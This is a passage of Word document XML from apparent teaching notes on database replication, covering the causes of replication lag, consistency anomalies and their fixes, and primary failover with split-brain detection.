              <w:t>Replica I/O saturation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11F14A" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
            <w:r w:rsidRPr="00496A4D">
              <w:t>Replica's disk is slower than primary's write rate</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00496A4D" w:rsidRPr="00496A4D" w14:paraId="7F460D1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DF588A" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
            <w:r w:rsidRPr="00496A4D">
              <w:t>Network congestion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5468D1" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
            <w:r w:rsidRPr="00496A4D">
              <w:t>WAL stream throttled by bandwidth</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00496A4D" w:rsidRPr="00496A4D" w14:paraId="6E4A02F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710C2A" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
            <w:r w:rsidRPr="00496A4D">
              <w:t>Large transactions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EC74CF" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
            <w:r w:rsidRPr="00496A4D">
              <w:t>A single transaction modifying 10M rows creates a large WAL burst</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00496A4D" w:rsidRPr="00496A4D" w14:paraId="45F3AA7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608870" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
            <w:r w:rsidRPr="00496A4D">
              <w:t>Schema changes (DDL)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5EE7EA" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
            <w:r w:rsidRPr="00496A4D">
              <w:t>ALTER TABLE on replica may take minutes (rebuilding table)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2FDF6263" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Catastrophic lag (hours):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27CE2A90" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1520"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00496A4D">
        <w:t>Replica was offline for hours → must replay accumulated WAL.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B438B70" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1520"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00496A4D">
        <w:t>Network between primary and replica was severed for extended time.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59491935" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1520"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00496A4D">
        <w:t>Replica is severely underpowered compared to primary.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6458F811" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>5.3 Problems Caused by Replication Lag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4431A102" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1. Read-Your-Own-Writes Violation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EFA94BB" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E289CF5" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>User updates profile: POST /profile → writes to primary → "Success"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="671A205E" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>User refreshes page: GET /profile → reads from replica → SEES OLD DATA!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7058AD48" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D"/>
    <w:p w14:paraId="14FC9C05" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>User thinks the update failed. Submits again. Confused.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39FA1ED8" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>2. Non-Monotonic Reads (Going Back in Time):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B7E12B2" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EA0026B" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>Read 1 → Replica A (caught up): sees comment posted at 14:30</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B898EDA" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>Read 2 → Replica B (lagging): doesn't see the comment yet!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0739FBB8" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D"/>
    <w:p w14:paraId="567A7000" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>User sees a comment, refreshes, comment disappears. "Am I going crazy?"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="322785A5" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3. Causality Violation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="313ED605" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52A557CE" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>User 1 posts a question: "What time is the meeting?"  (written at T=0)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C265972" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>User 2 posts an answer: "3 PM"                        (written at T=1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56423B8F" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D"/>
    <w:p w14:paraId="45F3D249" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>Replica B has User 2's answer but not User 1's question yet (lag).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35D72598" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>Reader sees: "3 PM" with no context. Makes no sense.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19CA015A" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>5.4 Solutions to Replication Lag Problems</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75A297F5" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1. Read-after-write consistency (read-your-own-writes):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79AC9008" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>Python</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C1E70D3" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>def get_profile(user_id, requesting_user):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66DB3A79" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t xml:space="preserve">    if requesting_user == user_id:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="035F1C7C" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t xml:space="preserve">        # User reading their own data → read from PRIMARY (always fresh)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72D4836E" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t xml:space="preserve">        return primary.query("SELECT * FROM users WHERE id = ?", user_id)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DC3109D" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t xml:space="preserve">    else:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F614867" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t xml:space="preserve">        # Reading someone else's data → replica is fine (slight lag acceptable)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72236A70" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t xml:space="preserve">        return replica.query("SELECT * FROM users WHERE id = ?", user_id)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53B72E6B" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Alternative — timestamp-based routing:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="357C8FB8" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>Python</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06A25F50" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>def get_profile(user_id, last_write_timestamp):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E2F2EE5" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    # Client tracks when they last wrote</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1326CED3" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t xml:space="preserve">    if replica.replication_position &gt;= last_write_timestamp:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52D94101" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t xml:space="preserve">        return replica.query(...)  # Replica has caught up</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="739FA0B9" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t xml:space="preserve">    else:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DE5BF7C" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t xml:space="preserve">        return primary.query(...)  # Replica still behind, read from primary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01EFCFA4" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2. Monotonic reads (session stickiness):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67FD8704" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04318664" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>Ensure the same user always reads from the SAME replica (within a session).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AFD5DF3" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t xml:space="preserve">  → Hash(user_id) → replica_number</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="650A393F" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t xml:space="preserve">  → User always sees a consistent view (may be slightly old, but never goes backward).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54431D65" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3. Causal consistency (read-after-dependency):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DCBA108" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77ED749D" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>Write A (question) assigned logical timestamp T=100</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B9F9A87" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>Write B (answer, depends on A) assigned timestamp T=101</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64F811AB" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D"/>
    <w:p w14:paraId="1BCACB3A" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>Replica must apply A before B (enforce causal order).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DE33E72" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>If reader sees B (T=101), they must also see A (T≤100).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21DF751B" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:pict w14:anchorId="088C93DE">
          <v:rect id="_x0000_i5643" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="149C508C" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>6. Failover — When the Primary Dies</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BCAC621" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>6.1 The Failover Process</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D1FAD77" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="034E8108" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>Normal operation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75B8B85D" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t xml:space="preserve">  Primary ← writes ←── Clients</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A85CB49" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t xml:space="preserve">  Primary → replicates → Replicas ← reads ←── Clients</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09D497E6" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D"/>
    <w:p w14:paraId="3BD40701" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>Primary fails:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="501D90E5" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  1. Detection: "Primary hasn't responded to heartbeats for 30 seconds."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="194C91BD" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t xml:space="preserve">  2. Election: "Replica 2 has the most recent data. Promote it."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="297FAC65" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t xml:space="preserve">  3. Promotion: Replica 2 becomes the new primary (accepts writes).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22056307" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t xml:space="preserve">  4. Reconfiguration: Other replicas now replicate from new primary.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43B4D032" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t xml:space="preserve">  5. Client redirect: DNS/proxy updated to point writes to new primary.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AA3E10A" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>6.2 Failure Detection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BFCEC10" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>How do we know the primary is actually dead?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40F8FAD4" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ABB68C4" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>Heartbeat mechanism:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72AEE132" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t xml:space="preserve">  Replica/monitor sends: PING (every 1 second)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A022BA2" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t xml:space="preserve">  Primary responds: PONG</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0050B20F" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32CB9283" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t xml:space="preserve">  If no PONG for N seconds → "Primary might be dead."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46C073BF" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60254B8A" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t xml:space="preserve">  But: is it actually dead? Or just:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11CFCF38" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t xml:space="preserve">    - Network partition (primary is fine, but we can't reach it)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C4D41E7" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t xml:space="preserve">    - Temporary overload (primary too busy to respond)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AE61B59" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t xml:space="preserve">    - GC pause (JVM-based, primary paused for 5 seconds)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18B41CD8" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The split-brain problem:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50C35984" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="714E0EFE" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>Network partition:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AA211A5" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t xml:space="preserve">  Partition A: [Replica 1, Replica 2] think primary is dead → elect new primary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="168BCC06" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
